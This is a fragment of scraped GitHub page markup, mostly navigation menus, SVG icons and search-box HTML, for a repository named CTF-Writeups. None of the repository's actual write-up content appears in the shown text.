aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="nQGQJzJTm2xcjewjEPcmLpfDpW4Y4i1AFJxS2S15FQCF+hBg5cxCUcLe//izRaiZ8g8MTorUdc2gvSoUKGwbPA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" 